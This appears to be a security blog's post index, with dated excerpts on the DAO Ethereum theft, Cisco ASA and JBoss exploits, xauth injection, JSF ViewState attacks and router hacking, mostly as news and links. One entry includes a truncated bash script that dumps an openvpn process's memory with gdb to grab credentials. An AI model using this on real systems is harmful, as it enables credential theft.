June 21, 2016
Cryptocurrency and Smart-Contracts security fail: the Ethereum $59 Million hack
Ethers is a cryptocurrency designed to power smart-contracts, autonomous programs that define how an amount of money will behave. A simple race condition in a very large smart-contract code allowed an attacker to steal $59 million of value from the DAO account: Bitcoin’s Largest Competitor Hacked: Over $59 Million “Ethers” Stolen In Ongoing Attack. Details here […]
June 16, 2016
Security nightmares are going Low-Level
Java and Flash have been and still are terrible 3rd-party components when it comes to the security of our PCs. While from a functional point of view they were rocket science in the '90s (anybody who remembers ActiveX would agree), nowadays they are sluggish, weakly integrated rectangles in our web pages. Finally both Oracle and Adobe […]
May 18, 2016
Cisco ASA Exploit Released!
In February 2016 we sent an Early Warning to our customers for a remote code execution (RCE) in Cisco ASA (CVE-2016-1287 or cisco-sa-20160210-asa-ike). Today a PoC has been published: https://github.com/exodusintel/disclosures/blob/master/CVE_2016_1287_PoC
You can find more details on:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1287
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160210-asa-ike
https://blog.exodusintel.com/2016/02/10/firewall-hacking/
March 14, 2016
Time to supercharge your restricted SSH accounts!
Time to hack restricted SSH accounts thanks to an injection in the “xauth” command! Not an exploit for everyone but CVE-2016-3115 and CVE-2016-3116 details have just been published on Full Disclosure, and they will be useful to a lot of people for sure :) If your remote provider gives you a restricted SSH access using a forced-command […]
November 20, 2015
JSF ViewState upside-down
Renaud Dubourguais and Nicolas Collignon released a nice paper on Java Server Faces security titled JSF ViewState upside-down (http://www.synacktiv.fr/ressources/JSF_ViewState_InYourFace.pdf). JSF implementations are often used in J2EE applications. JSF uses ViewStates, which have already been discussed for cryptographic weaknesses such as the padding oracle attack [PADDING]. ViewStates have also been abused to create client-side attacks […]
October 25, 2015
Grab credentials from a running openvpn process in Linux
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
# $1 is the PID of the openvpn process; each rw-p mapping is dumped to its own file
grep rw-p /proc/$1/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do
    gdb --batch-silent --silent --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; […]
October 9, 2015
Fishing the AWS IP Pool for Dangling Domains
Fishing the AWS IP Pool for Dangling Domains: Amazon and other cloud providers have made it child’s play to spin up ephemeral server instances for quick deployment of various services. If you want a web server to host your new .io domain name, you can have it set up in no time at all. Starting a website […]
October 9, 2015
Netgear R6200 wireless router pwnage
http://shadow-file.blogspot.it/2015/04/broken-abandoned-and-forgotten-code_22.html
http://shadow-file.blogspot.it/2015/04/abandoned-part-01.html
http://shadow-file.blogspot.it/2015/04/abandoned-part-02.html
http://shadow-file.blogspot.it/2015/05/abandoned-part-03.html
http://shadow-file.blogspot.it/2015/05/abandoned-part-04.html
http://shadow-file.blogspot.it/2015/05/abandoned-part-05.html
http://shadow-file.blogspot.it/2015/05/abandoned-part-06.html
http://shadow-file.blogspot.it/2015/06/abandoned-part-07.html
http://shadow-file.blogspot.it/2015/06/abandoned-part-08.html
http://shadow-file.blogspot.it/2015/06/abandoned-part-09.html
http://shadow-file.blogspot.it/2015/07/abandoned-part-10.html
http://shadow-file.blogspot.it/2015/07/abandoned-part-11.html
http://shadow-file.blogspot.it/2015/09/abandoned-part-12.html
http://shadow-file.blogspot.it/2015/10/abandoned-part-13.html
There is even a GitHub repository for the project!
March 31, 2015
Stack overflow in libtasn1
Stack overflow in libtasn1: libtasn1 is a library to parse ASN.1 data structures. Its most prominent user is GnuTLS. Fuzzing libtasn1 led to the discovery of a stack write overflow in the function _asn1_ltostr (file parser_aux.c). It overflows a temporary buffer variable on certain inputs. This issue has been reported to the developers on 2015-03-26. A fix was released […]
March 31, 2015
JBoss JMXInvokerServlet Remote Command Execution
JBoss JMXInvokerServlet Remote Command Execution: This code exploits a common misconfiguration in JBoss Application Server. Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" serialized Java object allows arbitrary code execution. This exploit works even if the "Web-Console" and the "JMX Console" are protected or disabled.